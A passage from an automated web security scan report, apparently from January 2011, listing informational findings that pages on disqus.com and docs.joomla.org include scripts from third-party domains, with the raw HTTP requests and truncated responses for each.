<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" con
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.132. http://disqus.com/AnonymousUser/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/AnonymousUser/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /AnonymousUser/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:41 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 12797
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" con
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.133. http://disqus.com/dashboard/x22/x3Eview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/dashboard/x22/x3Eview

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /dashboard/x22/x3Eview HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Mon, 24 Jan 2011 22:31:58 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 10682
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type"
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.134. http://disqus.com/embed/profile/unmerged_profiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/embed/profile/unmerged_profiles/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /embed/profile/unmerged_profiles/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 INTERNAL SERVER ERROR
Date: Mon, 24 Jan 2011 22:31:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
X-Sentry-ID: 3521cbce793946fc8e25d327f310431b
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10887

<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" c
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.135. http://disqus.com/forums/7newsboston/facebook.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/forums/7newsboston/facebook.html

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

GET /forums/7newsboston/facebook.html HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 1246
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>

<html>
<head>
<meta charse="utf-8">
<title></title>
<script src="http://connect.facebook.net/en_US/all.js"></script>

<script src="http://mediacdn.disqus.com/12956
...[SNIP]...

21.136. http://disqus.com/forums/integrations/twitter/tweetbox.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/forums/integrations/twitter/tweetbox.html

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /forums/integrations/twitter/tweetbox.html HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 INTERNAL SERVER ERROR
Date: Mon, 24 Jan 2011 22:31:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
X-Sentry-ID: af25630428e54dc28df4a12f364820e9
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10887

<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" c
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.137. http://disqus.com/forums/integrations/twitter/tweetbox.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/forums/integrations/twitter/tweetbox.html

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1

Request

GET /forums/integrations/twitter/tweetbox.html?f=7newsboston HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.138. http://disqus.com/profile/login/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/profile/login/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /profile/login/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:33 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 6310
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut
...[SNIP]...
</script>
    <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.139. http://disqus.com/saml/cnn/try/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/saml/cnn/try/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /saml/cnn/try/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 INTERNAL SERVER ERROR
Date: Mon, 24 Jan 2011 22:31:46 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-Sentry-ID: 5942542f1b2a47d6832e30158968a5b5
Content-Length: 10887
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" c
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.140. http://docs.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 18:24:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.141. http://docs.joomla.org/Administrators previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Administrators

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Administrators HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 16 Jan 2011 13:46:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.142. http://docs.joomla.org/Beginners previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Beginners

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Beginners HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 18 Jan 2011 17:19:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.143. http://docs.joomla.org/Category:Cookie_jar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Category:Cookie_jar

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:Cookie_jar HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 14:51:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.144. http://docs.joomla.org/Category:Development previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Category:Development

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:Development HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Thu, 20 Jan 2011 17:16:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.145. http://docs.joomla.org/Category:FAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Category:FAQ

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:FAQ HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Wed, 19 Jan 2011 19:00:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.146. http://docs.joomla.org/Category:Tips_and_tricks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Category:Tips_and_tricks

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:Tips_and_tricks HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 08 Jan 2011 16:58:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.147. http://docs.joomla.org/Cookie_jar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Cookie_jar

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Cookie_jar HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.148. http://docs.joomla.org/Developer_Email_lists previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Developer_Email_lists

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Developer_Email_lists HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 12:36:45 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.149. http://docs.joomla.org/Developers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Developers

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Developers HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Thu, 20 Jan 2011 17:18:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.150. http://docs.joomla.org/Development_Working_Group previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Development_Working_Group

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Development_Working_Group HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 12:39:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.151. http://docs.joomla.org/Documentation_Working_Group previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Documentation_Working_Group

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Documentation_Working_Group HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 16 Nov 2010 07:15:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.152. http://docs.joomla.org/Evaluators previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Evaluators

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Evaluators HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 18 Jan 2011 16:27:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.153. http://docs.joomla.org/GHOP_students/James_William_Ramsay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/GHOP_students/James_William_Ramsay

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /GHOP_students/James_William_Ramsay HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.154. http://docs.joomla.org/GHOP_students/Kevin_Hayne previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/GHOP_students/Kevin_Hayne

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /GHOP_students/Kevin_Hayne HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sat, 30 Oct 2010 01:55:13 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.155. http://docs.joomla.org/GHOP_students/Michael_Casha previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/GHOP_students/Michael_Casha

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /GHOP_students/Michael_Casha HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13901

